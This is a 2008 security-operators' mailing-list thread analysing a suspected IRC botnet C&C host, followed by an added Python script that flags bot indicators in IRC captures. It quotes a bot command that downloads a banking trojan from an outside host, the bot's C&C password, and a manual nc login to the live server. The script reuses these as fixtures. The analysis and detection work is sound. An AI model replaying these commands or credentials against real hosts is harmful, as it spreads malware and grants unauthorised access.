[nsp-sec] 66.139.78.164 = C&C? -> Bonus Info
White, Gerard
Gerard.White at aliant.ca
Mon Apr 14 11:37:15 EDT 2008
Bonus info:
JOIN ##ghetto## 3atsh1t
WGET hxxp://gh0st.us/228_22.exe (shoving it into the logged-in user's temp directory)
(Win32.Banker extremely well obfuscated)
VT is 5/32:
http://www.virustotal.com/analisis/26fdb0143fe27e421a21f7d915a96ed6
Anubis sez:
http://analysis.seclab.tuwien.ac.at/result.php?taskid=3d82292f7093eda4c55c023aac02054c
GW
855 - Aliant
> -----Original Message-----
> From: nsp-security-bounces at puck.nether.net
> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Jose Nazario
> Sent: Monday, April 14, 2008 12:31 PM
> To: Chris Calvert
> Cc: nsp-security NSP
> Subject: Re: [nsp-sec] 66.139.78.164 = C&C?
>
> ----------- nsp-security Confidential --------
>
> On Mon, 14 Apr 2008, Chris Calvert wrote:
>
> > Can anyone confirm seeing botnet C&C traffic for this host?
>
> i have several samples that *attempt* to contact it on TCP port 9798, but
> no indications they are able to. the DNS name they're using is
>
> gizmo.godaddyy.net
>
> which (at least sometimes) answers with that IP:
>
> <gethostbyname requested_host="gizmo.godaddyy.net"
> resulting_addr="82.146.52.179">
> <more_resulting_addr>
> <resulting_addr>143.248.133.157</resulting_addr>
> <resulting_addr>66.139.78.164</resulting_addr>
> <resulting_addr>70.61.92.197</resulting_addr>
> <resulting_addr>72.20.45.2</resulting_addr>
> <resulting_addr>72.20.45.3</resulting_addr>
> <resulting_addr>72.20.45.4</resulting_addr>
> <resulting_addr>72.20.45.5</resulting_addr>
> </more_resulting_addr></gethostbyname>
>
> here's how it's trying to connect:
>
> <irc_data username="XP-SP2" hostname="x" servername="x"
> realname="HOSTNAME" password="su1c1d3" nick="\00\USA\x70chlwnk7"
> non_rfc_conform="1"/>
>
>
>
> testing manually i see it's a bouncer:
>
> $ nc 66.139.78.164 9798
> <<< :psyBNC-2.3.2-4
> <<< :psyBNC-2.3.2-4
> >>> PASS su1c1d3
> >>> NICK \00\USA\x70 chlwnk7
> >>> USER XP-SP2 x x :MYHOST
> <<< ERROR :Closing Link: \00\USA\x70[HOSTNAME] ((-psyBNC) Wrong Password.
> Disconnecting.)
>
>
> looks live.
>
> -------------------------------------------------------------
> jose nazario, ph.d. <jose at arbor.net>
> security researcher, office of the CTO, arbor networks
> v: (734) 821 1427 http://asert.arbornetworks.com/
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security
> counter-measures.
> _______________________________________________
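One way to pick this handshake and the follow-on bot commands out of captured IRC traffic, as an added example that is not part of the original thread. The session lines are constructed from the exchange quoted above (psyBNC banner, PASS/NICK/USER with the \00\USA nick, the keyed JOIN and the WGET from the bonus info); the helper names, the verdict rule, the OS-tag username heuristic and the controller nick "op" are my assumptions.

```python
"""Flag IRC-bot / psyBNC C&C indicators in a captured IRC session.

Added example, not code from the original thread.  Sessions below are
constructed to mirror the quoted exchange; helper names, the verdict rule,
the OS-tag heuristic and the controller nick "op" are assumptions.
"""
import re
from typing import List, NamedTuple, Tuple


class IrcMsg(NamedTuple):
    prefix: str               # sender, without the leading ':'
    command: str              # upper-cased command; "" for a bare prefix line
    params: Tuple[str, ...]   # middle params plus the trailing param, if any


def parse_irc_line(line: str) -> IrcMsg:
    """Split one IRC line into prefix, command and params (RFC 1459 2.3.1).
    psyBNC greets with a bare ':psyBNC-2.3.2-4' line, so a prefix with no
    command is returned as command ''."""
    line = line.rstrip("\r\n")
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    # The trailing parameter starts at the first " :" and may contain spaces.
    head, sep, trailing = line.partition(" :")
    params = head.split()
    if sep:
        params.append(trailing)
    if not params:
        return IrcMsg(prefix, "", ())
    return IrcMsg(prefix, params[0].upper(), tuple(params[1:]))


# RFC 1459 nick: a letter followed by at most 8 letters, digits or specials
# ( - [ ] \ ` ^ { } ).  The bot's nick starts with '\' and is far longer,
# which is what the sandbox meant by non_rfc_conform="1".
RFC1459_NICK = re.compile(r"^[A-Za-z][A-Za-z0-9\-\[\]\\`^{}]{0,8}$")

# Heuristic (mine): idents that are really an OS/service-pack tag, as in
# 'USER XP-SP2 ...' from the sample.
OS_TAG = re.compile(r"^(XP|2K|2000|NT|9X|VISTA|WIN)", re.I)

# Download commands from the controller; WGET is the one seen in the thread.
# The defanged 'hxxp' scheme is accepted because that is how logs record it.
BOT_FETCH = re.compile(r"^(WGET)\s+((?:hxxp|http)s?://\S+)", re.I)


def nick_is_rfc1459(nick: str) -> bool:
    return RFC1459_NICK.fullmatch(nick) is not None


def analyze_session(session: List[Tuple[str, str]]) -> List[str]:
    """Walk (direction, line) pairs, 'C' = client->server, 'S' = server->client,
    and return one finding string per indicator, in session order."""
    findings: List[str] = []
    for direction, raw in session:
        msg = parse_irc_line(raw)
        if direction == "S":
            if msg.command == "" and msg.prefix.lower().startswith("psybnc"):
                findings.append("bouncer banner: " + msg.prefix)
            elif msg.command == "ERROR" and msg.params:
                findings.append("server closed link: " + msg.params[0])
            elif msg.command == "PRIVMSG" and len(msg.params) == 2:
                m = BOT_FETCH.match(msg.params[1])
                if m:
                    findings.append(f"fetch command from {msg.prefix}: {m.group(2)}")
        else:
            if msg.command == "PASS" and msg.params:
                findings.append("cleartext PASS: " + msg.params[0])
            elif msg.command == "NICK" and msg.params and not nick_is_rfc1459(msg.params[0]):
                findings.append("non-RFC nick: " + msg.params[0])
            elif msg.command == "USER" and msg.params and OS_TAG.match(msg.params[0]):
                findings.append("OS-tag username: " + msg.params[0])
            elif msg.command == "JOIN" and len(msg.params) >= 2:
                findings.append(f"keyed JOIN: {msg.params[0]} key={msg.params[1]}")
    return findings


def looks_like_bot_cnc(findings: List[str]) -> bool:
    """Verdict rule (mine): a bouncer banner plus either a malformed nick or
    a fetch command is enough to call the session C&C traffic."""
    has_banner = any(f.startswith("bouncer banner") for f in findings)
    has_bot = any(f.startswith(("non-RFC nick", "fetch command")) for f in findings)
    return has_banner and has_bot


# Constructed sessions.  BOT_SESSION is what a successful bot login would look
# like; PROBE_SESSION mirrors the manual nc test with the wrong password.
BOT_SESSION = [
    ("S", ":psyBNC-2.3.2-4"),
    ("C", "PASS su1c1d3"),
    ("C", "NICK \\00\\USA\\x70chlwnk7"),
    ("C", "USER XP-SP2 x x :HOSTNAME"),
    ("C", "JOIN ##ghetto## 3atsh1t"),
    ("S", ":op!x@x PRIVMSG ##ghetto## :WGET hxxp://gh0st.us/228_22.exe"),
]
PROBE_SESSION = [
    ("S", ":psyBNC-2.3.2-4"),
    ("S", ":psyBNC-2.3.2-4"),
    ("C", "PASS su1c1d3"),
    ("C", "NICK \\00\\USA\\x70chlwnk7"),
    ("C", "USER XP-SP2 x x :MYHOST"),
    ("S", "ERROR :Closing Link: \\00\\USA\\x70[HOSTNAME] ((-psyBNC) Wrong Password. Disconnecting.)"),
]
CLEAN_SESSION = [
    ("S", ":irc.example.net NOTICE AUTH :*** Looking up your hostname"),
    ("C", "NICK gerard"),
    ("C", "USER gerard 0 * :Gerard White"),
]

if __name__ == "__main__":
    for name, sess in (("bot", BOT_SESSION), ("probe", PROBE_SESSION), ("clean", CLEAN_SESSION)):
        f = analyze_session(sess)
        print(name, looks_like_bot_cnc(f), *f, sep="\n  ")
```

The rejected probe still scores as C&C because the bouncer banner and the malformed nick are both present; that is deliberate, since the credentials being replayed are the sample's, and a "Wrong Password" from psyBNC is itself confirmation that the listener is live. Feed the function real (direction, line) pairs from a pcap or proxy log rather than the constructed lists to use it on live traffic.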